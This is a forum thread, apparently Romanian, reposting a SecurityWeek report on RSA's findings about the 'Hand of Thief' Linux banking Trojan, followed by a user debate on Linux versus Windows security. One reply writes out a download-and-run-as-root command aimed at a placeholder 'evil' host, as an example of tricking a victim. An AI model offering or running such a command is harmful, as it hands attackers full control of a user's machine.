Jump to content
Matt

New Banking Trojan Targets Linux Users

Recommended Posts

Researchers from RSA have uncovered a new banking Trojan designed to steal information from machines running the Linux operating system.

Dubbed “Hand of Thief”, the Trojan is reportedly being sold in closed cybercrime communities for $2,000 with free updates.

“The current functionality includes form grabbers and backdoor capabilities, however, it’s expected that the Trojan will have a new suite of web injections and graduate to become full-blown banking malware in the very near future, ” Limor Kessem cyber Intelligence expert at RSA, explained in a blog post.

Assuming development continues and the new Trojan becomes fully functional, RSA expects the price to increase to $3,000, along with a $550 for major version releases, prices that coincide with other similar malware that targets Windows.

According to RSA, the developer behind Hand of Thief claims it has been tested on 15 different Linux desktop distributions, including Ubuntu Fedora and Debian. The malware also reportedly supports 8 different desktop Linux environments, including Gnome and Kde.

RSA researchers got their hands on the malware builder along with the server side source code, which allowed them to see some of the features that include:

• Form grabber for both HTTP and HTTPS sessions; supported browsers include Firefox, Google Chrome, as well as several other Linux-only browsers, such as Chromium, Aurora and Ice Weasel.

• Block list preventing access to specified hosts (a similar deployment used by the Citadel Trojan to isolate bots from security updates and anti-virus providers)

• Backdoor, backconnect and SOCKS5 proxy

• Anti-research tool box, which includes anti VM, anti-sandbox and anti-debugger

In terms of backend features, the developer has already put together a basic administration panel for the Trojan, which enables the botmaster to control the infected machines reporting to it. According to Kessem, the control panel shows a list of infected machines (bots), and provides a querying interface, along with other basic bot management options.

In addition to having cookie-stealing functionality, information captured by Hand of Thief’s command and control infrastructure includes stolen credentials which are stored in a MySQL database, along with other details including timestamp, user agent, website visited and POST data.

“Although Hand of Thief comes to the underground at a time when commercial Trojans are high in demand, writing malware for the Linux OS is uncommon, and for good reason,” Kessem wrote. “In comparison to Windows, Linux’s user base is smaller, considerably reducing the number of potential victims and thereby the potential fraud gains. Secondly, since Linux is open source, vulnerabilities are patched relatively quickly by the community of users. Backing this up is the fact that there aren’t significant exploit packs targeting the platform. In fact, in a conversation with the malware’s sales agent, he himself suggested using email and social engineering as the infection vector.”

Hand of Thief is not alone in being an emerging banking malware threat. Late last month, another new professional-grade banking Trojan was uncovered that RSA researchers said could soon rival Zeus, SpyEye and Citadel in how effectively it spreads. Dubbed KINS, the banking Trojan has several features in common with Zeus and SpyEye, as well as having a similar DLL-plugin-based architecture.

Sursa SecurityWeek.Com

Link to comment
Share on other sites

Vezi ca sunt unii pe aici care au mai multi ani pe Linux decat ai tu varsta.... AlMalalah! Uite ca sa vezi o chestie de rutina la unii pe aici... nici macar nu fac update fara sa probeze acel update intr-o masina virtuala... ca sa nu mai vorbesc de instalare programe in sistemul principal... Sunt sigur ca tu observi cand este ceva in neregula pe Windows... :)

Link to comment
Share on other sites

Habar n-aveti, nici tu, nici cei care ti-au dat like.

La fel de usor infectezi un Linux cum infectezi si un Windows. Te poti apara tu pe Windows? Esti produsul campaniilor de marketing ale producatorilor antivirus. In Linux e de ajuns sa manevrezi un fraier sa-ti execute wget http://x.x/evil | sudo sh ca sa-l arzi, iar pe Windows stiti toti cat de usor e. Vreti siguranta? Montati-va partitiile read-only sau folositi snapshoturi in VMware. Acum apar "troienii" astia de Linux ca tot mai multi utilizatori migreaza spre solutii free si open-source, si cum majoritatea e coapta ca tine, un patch grsec, ACL-uri si reguli stricte in iptables sunt fantasme. Sunteti internauti hardcore voi, stati pe Windows cu NOD32 si voi vorbiti de siguranta :))

Nu mai am antivirus de vreo 3-4 ani si niciodata nu m-am infectat cu vreun virus desi am descarcat si instalat destule programe crackuite, patchuri si alte chestii. Mai fac cate o scanare la vreo cateva luni dar de fiecare data nu e nimic. Si nici stealere nu am rulat.

Si sa stii ca nu un antivirus iti garanteaza siguranta. Conteaza pe ce dai click, ce rulezi, ce linkuri accesezi si asa mai departe. Poti vedea ce procese ruleaza pe pc, ce dll-uri foloseste fiecare proces, subprocese s.a.m.d. In plus poti testa sa vezi ce anume citeste/scrie/modifica un anume program oricand vrei tu.

Stiu ca or fi multi care folosesc linux de multa vreme insa comparativ cu restul sunt o foarte mica parte. Multi si-au pus linux ca au auzit ei ca e mai sigur insa pe linux foarte multi nici nu stiu cum sa acceseze task manager d-apoi sa mai vada procese si subprocese si ce face fiecare, ce acceseaza, ce citeste, scrie etc. Linux arata bine cu compiz ca se misca frumos ferestrele, apare foc si multe alte efecte misto insa daca nu stii tu sa verifici ce se intampla si ce e cu fiecare director/fisier de acolo, e mult mai nesigur decat zic ei ca e windowsul.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...